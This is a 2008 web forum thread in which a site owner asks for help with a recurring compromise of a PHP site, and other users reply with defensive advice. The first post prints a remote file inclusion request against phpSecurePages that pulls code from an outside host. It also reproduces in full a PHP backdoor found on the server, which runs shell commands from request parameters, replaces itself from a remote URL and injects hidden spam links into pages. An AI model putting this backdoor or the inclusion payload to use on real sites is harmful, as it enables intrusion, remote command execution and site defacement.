Page 1 of 1

repeated hacking attempts

Posted: Thu Oct 16, 2008 11:15 am
by ziggy1621
I've got a site that it seems an IRC bot is attacking and writing an activeX virus after the <body> tags. I've been fighting this for weeks and here is what I have....

It is shared hosting, so php.ini is not available and my htaccess is limited. Register_Globals was on, today I turned it off after some extensive reading. The hacker is running code like the following found in my logs:

Code: Select all

 
//phpSecurePages/secure.php?&cfgProgDir=http://rdxihx.angelfire.com/php
where the host its getting the file from changes each time, so blocking IP/Domains doesn't work and I have actually deleted phpSecurePages from the site and yet this script still works. You can follow the link after cfgProgDir to read the code that it accesses, then sometimes it creates a random file with the following code

Code: Select all

 
<?php
ignore_user_abort(1);
set_time_limit(0);
 
function Clear()
{
    unlink("c");
    unlink("1r");
  unlink("log");
}
 
function Clear2()
{
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
}
 
function GetVar($name, &$var)
{
    $var = "";
    if (isset($_POST[$name]))
        $var = $_POST[$name];
 
  if (isset($_GET[$name]))
        $var = $_GET[$name];
    
    if (($var) =="")
      return  false;
      else return true;
}
 
function Gen()
{
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"]))
        $sg = $_POST["sg"];
 
  if (isset($_GET["sg"]))
        $sg = $_GET["sg"]; 
        
    if (isset($_POST["gm"]))
      $g = $_POST["gm"];
 
    if (isset($_GET["gm"]))
        $g = $_GET["gm"];
        
        
    $path = "";
    $fr = fopen("1r", "a+");
    if (file_exists("c"))
    {
        $fconf = file("c");
        $tname = trim($fconf[0]);
        $cname = trim($fconf[1]);
        $curs = trim($fconf[2]);
        $pid = trim($fconf[3]);
        if ($pid == 100)
        {
            $pid = 0;
            $rnd = mt_rand(0, 999);
            $nm = "";
        for ($i=0; $i<3; $i++)
          {
              $ran = mt_rand(0,26);
              $sym = $alp[$ran];
              $nm = $nm.$sym;
          }
            $cname = $nm;
            mkdir("$tname/$cname");
            $curs = $g;
        }
    }
    else 
    {
        $rnd = mt_rand(0, 999);
        $nm = "";
      for ($i=0; $i<5; $i++)
        {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        $pid = 0;
        $curs = $g;
        mkdir($tname);
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        $rnd = mt_rand(0, 999);
        $nm = "";
    for ($i=0; $i<3; $i++)
      {
          $ran = mt_rand(0,26);
          $sym = $alp[$ran];
          $nm = $nm.$sym;
      }
        $cname = $nm;
    mkdir("$tname/$cname");
    }
  $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {
        $fp = fopen($gname."?g=$curs", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        
        $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
    }
    
    if ($j==100)
    {
      $fp = fopen($gname."?g=$curs&m=1", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        $map = "$path/$tname/$cname/$curs"."_lm.htm";
        fwrite($fr,"$map\n");
    }
    
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);
}
 
function Update()
{
    $thisname = "1.php";
    if (isset($_POST['u']))
      $u = $_POST['u'];
      
    if (isset($_GET['u']))
         $u = $_GET['u'];
         
     $fp = fopen($u, "r");
  $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
  fclose($fp);
  
  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}
 
function Com()
{
    if (isset($_POST['c']))
      @system($_POST['c']);
  if (isset($_GET['c']))
        @system($_GET['c']);
}
 
function MRepl()
{
    $mpt = "";
    $drs = "";
    $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
  $endtag = "</font></body></html><dd5> "; 
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt);
     // óäàëÿåì çàâåðøàþùèå õòìë òåãè
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fp = fopen($mpt, "r");
  $drs = '';
    while (!feof($fp))
    {
         $fc = fgets($fp, 1024);
         if (!$fc) 
         {  
       exit();
         }
       $drs .= $fc;
    }
  fclose($fp);
  $fin = $fin.$begtag;  
  $fin = $fin.$drs;
  $fin = $fin.$endtag; 
  $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}
 
function Main()
{
    if (isset($_POST['u']) || isset($_GET['u']))
    {
        Update();
        exit();
    }
    
    if (isset($_POST['c']) || isset($_GET['c']))
    {
        Com();
        exit();
    }
    
    if (isset($_POST['g']) || isset($_GET['g']))
    {
        Gen();
        exit();
    }
    
    if (isset($_POST['s']) || isset($_GET['s']))
    {
        MRepl();
        exit();
    }
    
  if (isset($_POST['cl']) || isset($_GET['cl']))
    {
        Clear();
        exit();
    }
    
    if (isset($_POST['cl2']) || isset($_GET['cl2']))
    {
        Clear2();
        exit();
    }
    
    echo "<ok>";
    
}
 
Main();
 
?>
Any Help Appreciated... I'm dying here

Re: repeated hacking attempts

Posted: Fri Oct 17, 2008 1:52 pm
by youropensource
Please check your file and folder permission, and change the file permission 755 or 777 to 644.

Re: repeated hacking attempts

Posted: Sun Oct 19, 2008 2:05 am
by Mordred
It looks like a bot probing for known exploits. The one you cite is this: http://secunia.com/advisories/15994/
IF you don't have the software in question, there's no need to worry. Alert your hosting provider if it goes on.

Re: repeated hacking attempts

Posted: Fri Oct 31, 2008 2:42 am
by czyhx
I think you can write PHP code like this

Code: Select all

include dirname(__FILE__).'/'.$cfgProgDir;
If you don't do this. It is looks like

Code: Select all

include('http://rdxihx.angelfire.com/dd.php');
I'M sorry.I only know a little English.

Re: repeated hacking attempts

Posted: Fri Oct 31, 2008 4:58 am
by Hannes2k
Hi,
"phpSecurePages is a PHP module to secures pages with a login name and password." oO, how could this be vulnerable to file inlucsion attack.


If you have deleted phpSecurePages from your webspace, and there is no other php backdoor, this exploit won't work anymore.

But you said that this attacks still works, is there maybe a backdoor php file? An attacker normaly uploads an own php script with a backdoor, so if you close the vulnerable script, the attacker has furthermore access to your website.
Check all php files, or, delete your complete website (if possible) and upload your orignal files.
A php backdoor could also be part of a legal php script, just by adding some code lines to existing scripts.

Re: repeated hacking attempts

Posted: Fri Oct 31, 2008 9:53 am
by ziggy1621
Hannes2k wrote:Hi,
"phpSecurePages is a PHP module to secures pages with a login name and password." oO, how could this be vulnerable to file inlucsion attack.
a little searching the web shows that it has a couple of vulnerabilities. Just because its sold as a 'security' software, doesn't mean the code is perfect